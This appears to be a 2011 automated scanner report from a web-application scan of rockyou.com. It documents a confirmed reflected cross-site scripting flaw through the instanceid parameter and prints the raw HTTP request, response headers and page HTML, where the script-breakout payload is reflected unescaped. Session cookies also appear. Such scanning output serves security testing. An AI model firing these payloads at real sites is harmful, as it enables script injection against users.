Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001081)%3C/script%3E&refid=117242930&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); mem..
|
- /setinappropriate.php
/setinappropriate.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| instanceid | GET | '"--></style></script><script>alert(0x0016AC)</script> |
Request
GET /setinappropriate.php?instanceid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0016AC)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165100; ctid=1; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=%2F%2Fnetsparker.com%2Fn%2Fn.css%3F0x0016A4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165100; ctid=1; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=%2F%2Fnetsparker.com%2Fn%2Fn.css%3F0x0016A4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:18:21 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:18:20 GMT; path=/; domain=.rockyou.com,lastlogin=1303165101; expires=Wed, 27-Jul-2011 22:18:21 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:18:21 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=10014 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4192
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<!-- TF 728x90 JScript NoAD code -->
<div style="width:850px;margin-bottom:10px;">
<div style='padding-left:60px;'>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<br><div style="font-size:18px; font-weight:bold; color: #ff6c00;">Flag Show for Inappropriate Content</div>Invalid Instance ID. =(<SCRIPT LANGUAGE="JavaScript">function redirect(){ window.location = "show_my_gallery.php?instanceid='"--></style></script><script>netsparker(0x0016AC)</script>";}</SCRIPT>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
<div style="border:1px solid #ccc;margin-top:70px;width:176px;height:236px;margin-bottom:10px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/AGE=/GENDER=/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/" ' +
'width="160" height="220" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=SHOWMYGALLLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/aamsz=PM3/AGE=/GENDER=/-->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/aamsz=PM3/AGE=/GENDER=/" ' +
'width="180" height="288" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/aamsz=PM3/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/aamsz=PM3/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
<br />
<div style="width:120px;">
<div style="border:1px solid white;margin-top:5px;width:176px;height:616px;margin-bottom:5px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=SKYS/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=CWIDGET/aamsz=SKYS/AGE=/GENDER=/" ' +
'width="160" height="600" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=CWIDGET/aamsz=SKYS/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=CWIDGET/aamsz=SKYS/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
</div>
<div style="margin-top:10px;width:160px;overflow:hidden;padding:0px;text-align:center;">
<!-- YB: right_bottom (160x600) -->
<script type="text/javascript"><!--
yieldbuild_client = 4;
yieldbuild_loc = "right_bottom";
yieldbuild_options = {};
//--></script>
<script type="text/javascript" src="http://yieldbuild.com/javascripts/s_ad.js"></script>
</div>
</div>
<br><br>
<div class="tp" style="text-align:center">
Copyright © 2008 RockYou | Member of the Alloy Online Advertising Network<br><a target="_BLANK" href="/help">FAQ / Help</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-helpspace&url=http%3A%2F%2Fwww.rockyou.com%2Fhelpspace">MySpace Profile Tips</a> | <a target="_BLANK" href="/privacypolicy.php">Privacy</a> | <a href="/tos.php" target=_blank>Terms of Use</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-dev-pub&url=http%3A%2F%2Fwww.rockyouads.com%2F" target="_blank">Facebook Advertisers</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-dev-pub&url=http%3A%2F%2Fwww.rockyouads.com%2F" target="_blank">Facebook Developers</a> | <a href="/corp/about.php" target=_blank>About Us</a></div>
<div class="tp" style="text-align:center">
<a href="?lang=en&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">English</a> | <a href="?lang=zh&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">中文</a> | <a href="?lang=es&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">Español | <a href="?lang=pt&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">Português</a></a>
</div>
<br>
<br>
<script language="javascript">
if (navigator.cookieEnabled && document.cookie.indexOf('AAMBLFLAG=') == -1) {
var blTomorrow = new Date();
blTomorrow.setTime(blTomorrow.getTime() + 86400000);
document.cookie = 'AAMBLFLAG=SET; expires=' + blTomorrow.toGMTString();
if (document.cookie.indexOf('AAMBLFLAG=') > -1)
document.wr..
Date: Mon, 18 Apr 2011 22:18:21 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:18:20 GMT; path=/; domain=.rockyou.com,lastlogin=1303165101; expires=Wed, 27-Jul-2011 22:18:21 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:18:21 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=10014 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4192
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<!-- TF 728x90 JScript NoAD code -->
<div style="width:850px;margin-bottom:10px;">
<div style='padding-left:60px;'>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<br><div style="font-size:18px; font-weight:bold; color: #ff6c00;">Flag Show for Inappropriate Content</div>Invalid Instance ID. =(<SCRIPT LANGUAGE="JavaScript">function redirect(){ window.location = "show_my_gallery.php?instanceid='"--></style></script><script>netsparker(0x0016AC)</script>";}</SCRIPT>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
<div style="border:1px solid #ccc;margin-top:70px;width:176px;height:236px;margin-bottom:10px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/AGE=/GENDER=/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/" ' +
'width="160" height="220" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=SHOWMYGALLLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/aamsz=PM3/AGE=/GENDER=/-->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/aamsz=PM3/AGE=/GENDER=/" ' +
'width="180" height="288" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/aamsz=PM3/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/aamsz=PM3/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
<br />
<div style="width:120px;">
<div style="border:1px solid white;margin-top:5px;width:176px;height:616px;margin-bottom:5px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=SKYS/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=CWIDGET/aamsz=SKYS/AGE=/GENDER=/" ' +
'width="160" height="600" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=CWIDGET/aamsz=SKYS/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=CWIDGET/aamsz=SKYS/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
